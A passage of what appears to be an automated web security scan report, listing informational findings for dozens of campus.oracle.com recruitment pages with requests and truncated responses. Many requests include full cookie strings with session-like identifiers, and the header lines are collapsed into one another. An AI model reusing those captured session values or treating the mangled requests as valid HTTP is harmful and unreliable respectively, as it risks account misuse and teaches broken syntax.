GET /campus/HR/instructions.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/zealand-apply.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.24. https://campus.oracle.com/campus/HR/japan_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/japan_main.html
Request
GET /campus/HR/japan_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.25. https://campus.oracle.com/campus/HR/korea_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/korea_main.html
Request
GET /campus/HR/korea_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.26. https://campus.oracle.com/campus/HR/lad-internship.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/lad-internship.html
Request
GET /campus/HR/lad-internship.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.27. https://campus.oracle.com/campus/HR/lad_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/lad_main.html
Request
GET /campus/HR/lad_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.28. https://campus.oracle.com/campus/HR/malay_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/malay_main.html
Request
GET /campus/HR/malay_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.29. https://campus.oracle.com/campus/HR/news.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/news.html
Request
GET /campus/HR/news.html HTTP/1.1/campus/HR/news.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON; _csoot=1318854354624
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.30. https://campus.oracle.com/campus/HR/pak_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/pak_main.html
Request
GET /campus/HR/pak_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.31. https://campus.oracle.com/campus/HR/ph_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/ph_main.html
Request
GET /campus/HR/ph_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.32. https://campus.oracle.com/campus/HR/sg_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/sg_main.html
Request
GET /campus/HR/sg_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.33. https://campus.oracle.com/campus/HR/sitemap.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/sitemap.html
Request
GET /campus/HR/sitemap.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/html4/loose.dtd">/1999/xhtml">...[SNIP]...
15.34. https://campus.oracle.com/campus/HR/thai_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/thai_main.html
Request
GET /campus/HR/thai_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.35. https://campus.oracle.com/campus/HR/transition_4.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/transition_4.html
Request
GET /campus/HR/transition_4.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.36. https://campus.oracle.com/campus/HR/us-apply_now.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-apply_now.html
Request
GET /campus/HR/us-apply_now.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_current-openings.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; _csoot=1318854988404; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.37. https://campus.oracle.com/campus/HR/us-calendar.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-calendar.jsp
Request
GET /campus/HR/us-calendar.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us_main.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus-1252/html4/loose.dtd">...[SNIP]...
15.38. https://campus.oracle.com/campus/HR/us-home.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-home.html
Request
GET /campus/HR/us-home.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us_main.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; _csoot=1318854988404; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.39. https://campus.oracle.com/campus/HR/us-internship-global.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-internship-global.html
Request
GET /campus/HR/us-internship-global.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.40. https://campus.oracle.com/campus/HR/us-profile-direct.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-direct.jsp
Request
GET /campus/HR/us-profile-direct.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
15.41. https://campus.oracle.com/campus/HR/us-profile.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile.html
Request
GET /campus/HR/us-profile.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us_main.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.42. https://campus.oracle.com/campus/HR/us-profile_mobile.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile_mobile.html
Request
GET /campus/HR/us-profile_mobile.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile_redirect.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.43. https://campus.oracle.com/campus/HR/us-profile_mobile_redirect.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile_mobile_redirect.html
Request
GET /campus/HR/us-profile_mobile_redirect.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-home.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.44. https://campus.oracle.com/campus/HR/us-upload-file.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-upload-file.jsp
Request
GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
15.45. https://campus.oracle.com/campus/HR/us_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us_main.html
Request
GET /campus/HR/us_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.46. https://campus.oracle.com/campus/HR/viet_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/viet_main.html
Request
GET /campus/HR/viet_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.47. https://campus.oracle.com/campus/HR/zealand-apply.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/zealand-apply.html
Request
GET /campus/HR/zealand-apply.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/zealand_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.48. https://campus.oracle.com/campus/HR/zealand-home.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/zealand-home.html
Request
GET /campus/HR/zealand-home.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/zealand_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; _csoot=1318854354624; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.49. https://campus.oracle.com/campus/HR/zealand_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/zealand_main.html
Request
GET /campus/HR/zealand_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.50. https://campus.oracle.com/campus/campus_feed.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/campus_feed.xml
Request
GET /campus/campus_feed.xml HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server.oracle.com</link>...[SNIP]...
15.51. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
Request
GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/head><body><script><!--.core.client.',qbc='com.google.gwt.http.client.'...[SNIP]...
15.52. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
previous
next
Summary
Severity:
Information
Confidence:
